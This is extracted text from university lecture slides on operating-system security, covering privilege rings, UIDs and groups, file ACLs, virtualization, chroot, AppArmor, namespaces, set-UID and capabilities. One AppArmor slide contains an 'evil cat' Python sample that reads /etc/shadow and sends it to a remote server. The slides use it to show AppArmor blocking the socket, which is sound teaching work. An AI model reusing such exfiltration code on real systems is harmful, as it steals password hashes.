Security in Operating Systems

SIO

João Paulo Barraca

Operating Systems

Service Application
User mode:
Execute in normal CPU mode,
No access to privileged instructions

system calls
Kernel mode:
OS kernel Execute in privileged CPU mode;
Has access to privileged instructions

Hardware

João Paulo Barraca, André Zúquete SIO 2

Objectives of the Kernel
• Initialize devices (boot time)

• Virtualize the hardware

ꟷ Explore the hardware according to a specific computational model

• Enforce protection policies and provide protection mechanisms

ꟷ Against involuntary mistakes
ꟷ Against non-authorized activities

• Provide a Virtual File System

ꟷ Agnostic of the actual storage devices used

João Paulo Barraca, André Zúquete SIO 3

Execution Rings User Applications
(ring 3)
• Levels of privilege rings regarding CPU Instructions
ꟷ Used by CPUs to prevent non-privileged code from running
privileged opcodes (ring 2)
• e.g., IN/OUT, TLB manipulation, Access to hardware

• Nowadays processors have 4 rings (ring 1)

ꟷ 0 Kernel mode
ꟷ 1 Drivers (mostly unused) Operating System
(ring 0)
ꟷ 2 IO privileged code (mostly unused)
ꟷ 3 User-mode
Hardware
• Transfer of control between rings requires special
gates
ꟷ The ones that are used by system calls (aka syscalls)
ꟷ Interruptions and Traps act as gates

João Paulo Barraca, André Zúquete SIO 4

Computational Mode
• Set of entities (objects) managed by the OS kernel
̶ Define how applications interact with the kernel

Virtual Objects Physical Objects

• User identifiers • Physical devices
• Storage
• Processes • Magnetic disks, optical disks, silicon disks, tapes
• Virtual memory • Network interfaces

• Files and file systems • Wired, wireless

• Human-computer interfaces
• Communication channels • Keyboards, graphical screens, text consoles, mice

• Serial/parallel I/O interfaces

• USB, Bluetooth
• Serial ports, parallel ports, infrared

João Paulo Barraca, André Zúquete SIO 5

User Identifiers (UID)
• For the OS kernel a user is an identifier (number or UUID)
ꟷ Established during a login operation
ꟷ User ID (UID)

• All activities are executed on a computer on behalf of a UID

ꟷ UID allows the kernel to assert what is allowed/denied to them

ꟷ Linux: UID 0 is omnipotent (root) ̶ Windows: concept of privileges

• Administration activities are usually executed with UID 0 • For administration, system configuration, etc.
• Some processes can restrict the actions of the root user • There is no unique, well-known administrator identifier
• Administration privileges can be bound to several UIDs
• Usually through administration groups
ꟷ macOS: UID 0 is omnipotent for management • Administrators, Power Users, Backup Operators
• Some binaries and activities are restricted, even for root

João Paulo Barraca, André Zúquete SIO 6

 Group Identifiers (GID)
• OS also address group identifiers
ꟷ A group is composed by zero or more users
ꟷ A group may be composed by other groups
ꟷ Group ID: Integer value (Linux, Android, macOS) or UUID (Windows)

• User may belong to multiple groups

ꟷ User rights = rights of its UID + rights of its GIDs

• In Linux, activities always execute under the scope of a set of groups

ꟷ One primary group: used to define the ownership of created files
ꟷ Multiple secondary groups: used to condition access to resources

$ id
uid=1000(user) gid=1000(user)
groups=1000(user),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),
117(scanner),140(wireshark),,143(vboxsf),145(docker)

João Paulo Barraca, André Zúquete SIO 7

Processes
• A process defines the context of an activity
ꟷ For taking security-related decisions
ꟷ For other purposes (e.g., scheduling, identifiers)

• Security-related context
ꟷ Effective Identity (eUID and eGIDs)
• Vital for enforcing access control
• May be the same as the identity of the user launching the process
ꟷ Resources being used
• Open files and Communication channels
ꟷ Reserved virtual memory areas
ꟷ CPU time used, priority, affinity, namespace

João Paulo Barraca, André Zúquete SIO 8

Some of the process context as in /proc/self
$ ls /proc/self
arch_status cgroup coredump_filter environ gid_map limits mem net oom_score personality schedstat smaps_rollup status timers
attr clear_refs cpu_resctrl_groups exe io loginuid mountinfo ns oom_score_adj projid_map sessionid stack syscall timerslack_ns
autogroup cmdline cpuset fd ksm_merging_pages map_files mounts numa_maps pagemap root setgroups stat task uid_map
auxv comm cwd fdinfo ksm_stat maps mountstats oom_adj patch_state sched smaps statm timens_offsets wchan

$ cat /proc/self/cmdline
cat/proc/self/cmdline

$ ls /proc/self/fd -la
total 0
dr-x------ 2 user user 4 Nov 25 17:33 .
dr-xr-xr-x 9 user user 0 Nov 25 17:33 ..
lrwx------ 1 user user 64 Nov 25 17:33 0 -> /dev/pts/0
lrwx------ 1 user user 64 Nov 25 17:33 1 -> /dev/pts/0
lrwx------ 1 user user 64 Nov 25 17:33 2 -> /dev/pts/0
lr-x------ 1 user user 64 Nov 25 17:33 3 -> /proc/112013/fd

$ cat /proc/self/status
Name: cat
RssAnon: 0 kB CapEff: 0000000000000000
Umask: 0002
RssFile: 1668 kB CapBnd: 000001ffffffffff
State: R (running)
RssShmem: 0 kB CapAmb: 0000000000000000
Tgid: 112013
VmData: 360 kB NoNewPrivs: 0
Ngid: 0
VmStk: 132 kB Seccomp: 0
Pid: 112013
VmExe: 24 kB Seccomp_filters: 0
PPid: 1846
VmLib: 1592 kB Speculation_Store_Bypass: not vulnerable
TracerPid: 0
VmPTE: 56 kB SpeculationIndirectBranch: always enabled
Uid: 1000 1000 1000 1000
VmSwap: 0 kB Cpus_allowed: f
Gid: 1000 1000 1000 1000
HugetlbPages: 0 kB Cpus_allowed_list: 0-3
FDSize: 64
CoreDumping: 0 Mems_allowed:
Groups: 4 20 24 25 27 29 30 44 46 100 106 111 117 140 142 143 145 1000
THP_enabled: 1 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000
NStgid: 112013
untag_mask: 0xffffffffffffffff 000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0
NSpid: 112013
Threads: 1 0000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000
NSpgid: 112013
SigQ: 0/15186 00,00000000,00000000,00000000,00000000,00000000,00000001
NSsid: 1846
SigPnd: 0000000000000000 Mems_allowed_list: 0
Kthread: 0
ShdPnd: 0000000000000000 voluntary_ctxt_switches: 0
VmPeak: 5712 kB
SigBlk: 0000000000000000 nonvoluntary_ctxt_switches: 0
VmSize: 5712 kB
VmLck: 0 kB SigIgn: 0000000000000000
VmPin: 0 kB SigCgt: 0000000000000000
VmHWM: 1668 kB CapInh: 0000000800000000
VmRSS: 1668 kB CapPrm: 0000000000000000

João Paulo Barraca, André Zúquete SIO 9

Virtual Memory
• The address space where activities take place
ꟷ Have the maximum size defined by the hardware architecture
ꟷ 32 bits -> 232 Bytes, 64 bits -> 264 Bytes
ꟷ Managed in small chunks, named pages (4096 bytes)

• Virtual Memory can be sparse

ꟷ Only the pages used must be allocated
ꟷ Although processes always see a contiguous memory space

• Virtual Memory is mapped to RAM when in use by applications

ꟷ At a given moment, the RAM has pages from multiple address spaces
ꟷ The choice of how to manage those spaces is very important
• Avoid fragmentation, management memory according to their freshness
ꟷ Process memory will contain all current state regarding the current execution

João Paulo Barraca, André Zúquete SIO 10

 … 0xfffffff

Stack
grows top->bottom
Stack Segment (SS)

Code mapped by several processes

Accessing memory
outside an allocated Shared Libraries
Data (variables) privately allocated
segment yields SIGSEGV by each process

Programs cannot interact Heap

with other programs grows bottom->top
malloc(sizeof(int))
memory space due to
permissions BSS
Unitialized global variables (char a[5])
Data Segment (DS)
Data
Constant variables (const int i = 0)
Code
Program Code
Code Segment (CS)

…
0x00000000

João Paulo Barraca, André Zúquete SIO 11

$ cat /proc/self/maps
55de2be8f000-55de2be91000 r--p 00000000 08:01 3982026 /usr/bin/cat
55de2be91000-55de2be97000 r-xp 00002000 08:01 3982026 /usr/bin/cat
55de2be97000-55de2be9a000 r--p 00008000 08:01 3982026 /usr/bin/cat
55de2be9a000-55de2be9b000 r--p 0000a000 08:01 3982026 /usr/bin/cat
55de2be9b000-55de2be9c000 rw-p 0000b000 08:01 3982026 /usr/bin/cat
55de68c30000-55de68c51000 rw-p 00000000 00:00 0 [heap]
7fa850800000-7fa850aeb000 r--p 00000000 08:01 3989858 /usr/lib/locale/locale-archive
7fa850c17000-7fa850c3c000 rw-p 00000000 00:00 0
7fa850c3c000-7fa850c64000 r--p 00000000 08:01 4212200 /usr/lib/x86_64-linux-gnu/[Link].6
7fa850c64000-7fa850dc9000 r-xp 00028000 08:01 4212200 /usr/lib/x86_64-linux-gnu/[Link].6
7fa850dc9000-7fa850e1f000 r--p 0018d000 08:01 4212200 /usr/lib/x86_64-linux-gnu/[Link].6
7fa850e1f000-7fa850e23000 r--p 001e2000 08:01 4212200 /usr/lib/x86_64-linux-gnu/[Link].6
7fa850e23000-7fa850e25000 rw-p 001e6000 08:01 4212200 /usr/lib/x86_64-linux-gnu/[Link].6
7fa850e25000-7fa850e32000 rw-p 00000000 00:00 0
7fa850e4f000-7fa850e51000 rw-p 00000000 00:00 0
7fa850e51000-7fa850e55000 r--p 00000000 00:00 0 [vvar]
7fa850e55000-7fa850e57000 r-xp 00000000 00:00 0 [vdso]
7fa850e57000-7fa850e58000 r--p 00000000 08:01 4212181 /usr/lib/x86_64-linux-gnu/[Link].2
7fa850e58000-7fa850e7f000 r-xp 00001000 08:01 4212181 /usr/lib/x86_64-linux-gnu/[Link].2
7fa850e7f000-7fa850e8a000 r--p 00028000 08:01 4212181 /usr/lib/x86_64-linux-gnu/[Link].2
7fa850e8a000-7fa850e8c000 r--p 00033000 08:01 4212181 /usr/lib/x86_64-linux-gnu/[Link].2
7fa850e8c000-7fa850e8e000 rw-p 00035000 08:01 4212181 /usr/lib/x86_64-linux-gnu/[Link].2
7ffc9bc99000-7ffc9bcba000 rw-p 00000000 00:00 0 [stack]

João Paulo Barraca, André Zúquete SIO 12

File System Objects
• Hierarchical structure for storing content
ꟷ Provide a method for representing mount points, directories,
files and links

• Mount Point • Directory (or folder)

ꟷ An access to the root of a specific FS ꟷ A hierarchical organization method
• Similar to a container
ꟷ Windows uses letters (A:, .. C:..)
ꟷ Can contain other directories, files, mount points, links
ꟷ Linux, macOs, Android use any directory
ꟷ The first (or top-most) is called by root

• Links
ꟷ Indirection mechanisms in FS
ꟷ Soft Links: point to another feature in any FS
• Windows: Shortcuts are similar to Soft Links, but handled at the application level
ꟷ Hard Links: provide multiple identifiers (names) for the same content (data) in the same FS
• Usually allowed only for files

João Paulo Barraca, André Zúquete SIO 13

File System: security mechanisms
• Mandatory protection mechanisms
ꟷ Owner
ꟷ Users and Groups allowed
ꟷ Permissions: Read, Write, Run
• Different meanings for Files and Directories

• Discretionary protection mechanisms

ꟷ User-defined specific rules

• Additional mechanisms
ꟷ Implicit compression
ꟷ Indirection to remote resources (e.g., for OneDrive)
ꟷ Signature
ꟷ Encryption

João Paulo Barraca, André Zúquete SIO 14

Access Control
• An OS kernel is an access control monitor
ꟷ Controls all interactions with the hardware
ꟷ Applications NEVER directly access resources
ꟷ Controls all interactions between computational model entities

• Subjects
ꟷ Typically, local processes
• Through the system calls API
• A syscall is not an ordinary call to a function
ꟷ But also, messages from other machines

João Paulo Barraca, André Zúquete SIO 15

Access Control
Access to files is mediated through the kernel and is never direct
Simple application that
#include <stdlib.h> uses fopen, fwrite and
#include <stdio.h> fclose to write a string
to a file.
#include <string.h>

How those functions

int main(int argc, char** argv){ actually work?

FILE *fp = fopen("[Link]", "wb");

char* str = "hello world";
fwrite(str, strlen(str), 1, fp);
fclose(fp);
}
João Paulo Barraca, André Zúquete SIO 16
Access Control
Access to files is mediated through the kernel and is never direct
$ gcc -o main ./main

$ strace ./main
fopen calls the openat
and fstat syscalls
....
fwrite calls the write
syscall
openat(AT_FDCWD, "[Link]", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3

fclose calls the close

fstat(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
syscall
write(3, "hello world", 11) = 11
All interactions are made
through the Kernel.
close(3) = 0
Applications do not
access resources directly.
...

João Paulo Barraca, André Zúquete SIO 17

Mandatory Access Control

• They are part of the logic of the computational model

̶ They cannot be modified by users and administrators
̶ Unless they change the behavior of the kernel (recompile)

• Some:
̶ Linux: root can access all resources/memory
̶ Linux: Signals to processes can only be sent by the owner (or root)
̶ Linux: Sockets of type AF_PACKET require CAP_NET_RAW (or root)
̶ macOS: System Integrity Protection (SIP) restricts root to change critical files
̶ Windows: Files and processes have Integrity Levels

João Paulo Barraca, André Zúquete SIO 18

Discretionary Access Control

• The capability to enforce controls is present, but rules are not defined
̶ Kernel will process objects in order to determine the permissions of a process

• Users can set rules implementing an Access Control Policy

̶ Mandatory Access Control limits who can set which rules

• Examples:
̶ Configuration of permissions
̶ Definition of Access Control Lists
̶ Attribution of groups

João Paulo Barraca, André Zúquete SIO 19

File System Protection Mechanisms

• Mandatory protection mechanisms

̶ Definition of Owner, Other Users in Known Groups, Other users
̶ Permissions: Read, Write, Run
• Different meanings for Files and Directories

• Discretionary protection mechanisms

̶ User-defined specific rules for additional mechanisms

• Some additional mechanisms

• Implicit compression
• Indirection to remote resources (e.g., for OneDrive)
• Signature
• Encryption

João Paulo Barraca, André Zúquete SIO 20

File System Protection Mechanisms
(Linux) Fixed Structure Permissions
• Each file system object has an ACL
̶ Binding 3 rights to 3 subjects
̶ Only the owner can update the ACL
̶ May additionally provide other discretionary rules

• Rights: R W X
̶ Read right / Listing right
̶ Write right / create or remove files or subdirectories
̶ Execution right / use as process’ current working directory

• Subjects
̶ An UID (owner) uid gid others
̶ A GID
̶ Others rwx r-x r--
João Paulo Barraca, André Zúquete SIO 21
File System Protection Mechanisms
(Windows) Flexible-structure, discretionary ACL

• Each object has an ACL and an owner Rights:

• The ACL grants 14 types of access rights to a Traverse Folder / Execute File
variable-size list of subjects List Folder / Read Data
• Owner can be an UID or a GID Read Attributes
Read Extended Attributes
• Owner has no special rights over the ACL
Create Files /Write Data
Create Folders / Append Data
Write Attributes
• Subjects: Write Extended Attributes
• Users (UIDs) Delete Subfolders and Files
• Groups (GIDs) Delete
Read Permissions
• The group “Everyone” stands for anybody
Change Permissions
Take Ownership

João Paulo Barraca, André Zúquete SIO 22

 [nobody@host ~]$ ls -la
total 12
drwxr-xr-x 2 root root 100 dez 7 21:39 .
drwxrwxrwt 25 root root 980 dez 7 21:39 ..
-rw-r----- 1 root root 6 dez 7 21:42 a
-rw-r--r-- 1 root root 6 dez 7 21:42 b
-rw-r-x---+ 1 root root 6 dez 7 21:42 c

[nobody@host ~]$ cat a

cat: a: Permission denied

[nobody@host ~]$ cat b

SIO_B
[nobody@host ~]$ cat c
SIO_C

[nobody@host ~]$ getfacl c

# file: c
# owner: root
# group: root
user::rw-
user:nobody:r-x
group::r--
mask::r-x
other::---

João Paulo Barraca, André Zúquete SIO 23

Virtual Machines
• Virtual machines provide na essential mechanism: confinement
ꟷ Implement a security domain constrained for use of a small set of applications
ꟷ Also provide a common abstraction with common hardware
• Even if the host hardware is modified

• Provide additional security mechanisms

ꟷ Resource Control: partition hardware to different applications
ꟷ Resource Access Prioritizationaccess to resources
ꟷ Isolated images for analysis of potentially malicious code
ꟷ Fast recovery to a known state

• Almost essential for tasks with secure operations (Internet services)

ꟷ Extensivelly adopted with Virtualization Based Security (VBS) in Windows 11
ꟷ Also facilitates security related tasks such as malware analysis

João Paulo Barraca, André Zúquete SIO 24

Execution Rings with Virtual Machines User Applications
(ring 3)
• Guest OS cannot execute privileged instructions
(ring 3)
ꟷ But it must in order to initialized the virtual hardware

(ring 3)

• Common approaches (2) Guest Operating System

ꟷ Software-based virtualization: applications “know” they are virtualized and there is (ring 3)
no kernel – therefore no issues Hypervisor
(ring 3)
ꟷ Direct execution of guest user-mode code: applications run natively at ring 3 (ring 2)
• With privileged instructions being rewritten by the hypervisor
• Guest OS can be executed without recompilation (ring 1)
• Hypervisor recompiles instructions in real time
Operating System
(ring 0)

Hardware

João Paulo Barraca, André Zúquete SIO 25

Execution Rings with Virtual Machines
• Hardware-assisted virtualization
User Applications
ꟷ Creation of a ring -1 below ring 0
(ring 3)
• For Hypervisor to manage different memory spaces for Guest OS
ꟷ It can virtualize hardware for many ring 0 kernels (ring 2)
ꟷ Direct access to hardware generates a trap
• Hypervisor catches trap and emulates the behavior (ring 1)

Guest Operating System

(ring 0)
• No need of binary translation: Guest OS’s run faster Hypervisor
ꟷ almost native performance, except for sensitive instructions (ring -1)

Hardware
• Requires hardware support
ꟷ Intel VTx, AMD-V
26

João Paulo Barraca, André Zúquete SIO

Chroot
• Used to reduce the visibility of a file system
ꟷ Each process descriptor has a root i-node number (Root Folder)
• From which absolute pathname resolution takes place
ꟷ Chroot changes it to an arbitrary directory
• The process’ file system view gets reduced as that directory becomes the process root folder (/)
ꟷ The chroot must have the program and all required files (including libraries)

• Can protect the file system from problematic applications

ꟷ e.g., public servers or downloaded applications
ꟷ Compromise of the application will only compromise the isolated chroot

João Paulo Barraca, André Zúquete SIO 27

Chroot
Applying chroot to a bash binary
# mkdir –p /tmp/chroot/bin └─$ ldd /bin/ls
# cp /bin/bash /tmp/chroot/bin [Link].1 (0x00007f65edee5000)
[Link].1 => /lib/x86_64-linux-gnu/[Link].1 (0x00007f65ede6b000)
# cp /bin/ls /tmp/chroot/bin [Link].6 => /lib/x86_64-linux-gnu/[Link].6 (0x00007f65edc75000)
… copy all libraries and files required [Link].0 => /lib/x86_64-linux-gnu/[Link].0 (0x00007f65edbda000)
/lib64/[Link].2 (0x00007f65edee7000)
└─$ ldd /bin/bash
[Link].1 (0x00007f8e117c3000)
# sudo chroot /tmp/chroot /bin/bash [Link].6 => /lib/x86_64-linux-gnu/[Link].6 (0x00007f8e11623000)
bash-5.2# ls / [Link].6 => /lib/x86_64-linux-gnu/[Link].6 (0x00007f8e1142d000)
/lib64/[Link].2 (0x00007f8e117c5000)
drwxrwxr-x 5 1000 1000 100 Nov 25 21:59 .
drwxrwxr-x 5 1000 1000 100 Nov 25 21:59 ..
drwxrwxr-x 2 1000 1000 80 Nov 25 22:02 bin
drwxrwxr-x 3 1000 1000 60 Nov 25 21:59 lib
ls command only shows two files.
drwxrwxr-x 2 1000 1000 60 Nov 25 22:01 lib64
The chroot only has two commands
bash-5.2# cd bin
and the required libraries.
bash-5.2# ls -l
total 1416
There is very little to compromise
-rwxr-xr-x 1 1000 1000 1298416 Nov 25 21:53 bash
-rwxr-xr-x 1 1000 1000 151376 Nov 25 22:02 ls

João Paulo Barraca, André Zúquete SIO 28

Apparmor
• Security Module for restricting applications based on a behavior model
ꟷ Requires kernel support for Linux Security Modules
ꟷ Focus on syscalls and their arguments called by applications in known locations
ꟷ Can work in complain and enforcement modes
ꟷ Generates entries in the system log to future audit of the behavior

• Configuration files define allowed activities

ꟷ Allow list specifying allowed operations
ꟷ One configuration file per application, applicable to a specific binary file path
• If file changes location, profile is not applied
ꟷ Applications can never have more accesses than defined
• Even if executed by root

João Paulo Barraca, André Zúquete SIO 29

Apparmor
import sys
from socket import socket, AF_INET, SOCK_STREAM

The Evil cat implementation, # Evil code that sends sensitive file to hacker server
which exfiltrates /etc/shadow with open('/etc/shadow', 'rb') as f:
data = [Link]()
when executed. s = socket(AF_INET, SOCK_STREAM)
[Link]( ("[Link]", 8888) )
Python file for brevity. Can be [Link](data)
compiled to a binary with [Link]()
nuitka
# Normal cat behavior
if len([Link]) < 2:
[Link](0)

with open([Link][1], 'r') as f:

print([Link](), end='')

The Apparmor profile, which # Profile at /etc/apparmor.d/[Link]

allows cat to read all files
/usr/bin/cat {
but it cannot open network #include <abstractions/base>
TCP sockets
deny network inet stream,
/** r,
João Paulo Barraca, André Zúquete SIO 30
}
 Apparmor
########## Apparmor Profile Disabled ############
cat is executed as root
and it prints the content of the file root@linux: ~# /usr/bin/cat sio_file
SIO_A
BUT: the /etc/shadow file is
sent to the attacker

########## Apparmor Profile Enabled ##############

root@linux: ~# /usr/bin/cat sio_file

Traceback (most recent call last):
cat is executed as root
File "/usr/bin/cat", line 7, in <module>
but the kernel denies access
s = socket(AF_INET, SOCK_STREAM)
to the creation of the socket.
File "/usr/bin/[Link]", line 144, in __init__
PermissionError: [Errno 13] Permission denied
Apparmor can be used to enforce
that applications behave as
expected.

João Paulo Barraca, André Zúquete SIO 31

Namespaces
• Allows partitioning of resources in views (namespaces)
ꟷ Processes in a namespace have a restricted view of the system
ꟷ Activated through syscalls by a simple process:
• clone: Defines a namespace to migrate the process to
• unshare: disassociates the process from its current context
• setns: puts the process in a Namespace

• Types of Namespaces
ꟷ Mount: Applied to mount points
ꟷ process id: first process has id 1
ꟷ network: "independent" network stack (routes, interfaces...)
ꟷ IPC: methods of communication between processes
ꟷ uts: name independence (DNS)
ꟷ user id: segregation of permissions
ꟷ cgroup: limitation of resources used (memory, CPU...)

João Paulo Barraca, André Zúquete SIO 32

Namespaces
Containers
• Explores namespaces to provide a virtual view of the system
̶ Network isolation, user ids, mounts, cgroups, etc...

• Processes are executed under a restrictive lightweight Virtual Machine

̶ A container is an applicational construction and not a kernel object
̶ Consists of an environment by composition of namespaces and cgroups
̶ Requires building bridges with the real system network interfaces, proxy processes

• Relevant approaches
̶ Docker: focus on running isolated applications based on a portable packet between systems
̶ Linux Containers (LXC): system allowing the execution of different workloads, including container
̶ SNAP: containerized software packages
• Provides better security through increased isolation of standard applications

João Paulo Barraca, André Zúquete SIO 33

Privilege Elevation
Set-UID
• Changes the UID of a process running a program stored on a Set-
UID file
̶ If the program file is owned by UID X and the set-UID ACL bit is set, then it will be
executed in a process with UID X, independently of the UID of the subject that
executed the program

• Provides means for privileged programs to run administration task

invoked by normal, untrusted users
̶ Change the user’s password (passwd)
̶ Change to super-user mode (su, sudo)
̶ Mount devices (mount)

João Paulo Barraca, André Zúquete SIO 34

Privilege Elevation
Set-UID
• Effective UID vs Real UID
̶ Real UID is the UID of the user that started the process
̶ Effective UID is the UID of the process for access control purposes
• The one that really matters for defining the rights of the process

• UID change process

̶ Ordinary application
• eUID = rUID = UID of process that was executed
• eUID cannot be changed (unless = 0 as root can do anything)
̶ Set-UID application
• eUID = UID application file owner, rUID = initial process UID
• eUID can revert to rUID
̶ rUID can never change, allowing track of who runs administrative tasks

João Paulo Barraca, André Zúquete SIO 35

 sudo is a set-uid binary [user@linux ~]$ ls -la /usr/sbin/sudo
-rwsr-xr-x 1 root root 140576 nov 23 15:04 /usr/sbin/sudo

id prints the current uid and gids [user@linux ~]$ id

uid=1000(user) gid=1000(user) groups=1000(user),998(sudoers)

[user@linux ~]$ sudo -s

sudo –s starts a shell as root
[sudo] password for user:

id now shows uid=0 [root@linux ~]# id

uid=0(root) gid=0(root) groups=0(root)

[root@linux ~]# exit

Direct execution has the same effect [user@linux ~]$ sudo id

but program is called directly uid=0(root) gid=0(root) groups=0(root)

João Paulo Barraca, André Zúquete SIO 36

Privilege Elevation
Capabilities
• Login as root is not advised because it’s impossible to track the identity of real user
̶ Process started as root as rUID = eUID = 0

• set-uid is better, but sets eUID=0, which grants all accesses

̶ Process will be able to modify files, other processes, networking….

• Capabilities: Mechanism which provides a scoped set of administrative access (a capability)

̶ Instead of full access as eUID=0, only provides access to a kernel subsystem
̶ Extensively supported, but not always used
̶ Full list of capabilities: [Link]
• Ex: CAP_SYS_BOOT: allows rebooting
• Ex: CAP_NET_RAW: allows packet capture and ICMP
• Ex: CAP_SYS_TIME: allows setting the machine time

João Paulo Barraca, André Zúquete SIO 37

Privilege Elevation
Capabilities
• Capabilities can originate from several sets:
̶ Inherited capabilities: the capabilities that are passed down from a running parent process to its child process.
̶ Permitted capabilities: the capabilities that a process is allowed to have.
̶ Bounding capabilities: the maximum set of capabilities that a process is allowed to have.
̶ Ambient capability: includes the capabilities that are in effect currently.
• It can be applied to the current process or its children at a later time.
̶ Effective capabilities: set is all the capabilities with which the current process is executing.

• Capabilities are stored in the file extended attributes

$ getcap /usr/bin/ping
/usr/bin/ping cap_net_raw=ep

• cap_net_raw: use RAW and PACKET sockets;

• ep: The capability is the Permitted Set (P) and will be Effective (E)

João Paulo Barraca, André Zúquete SIO 38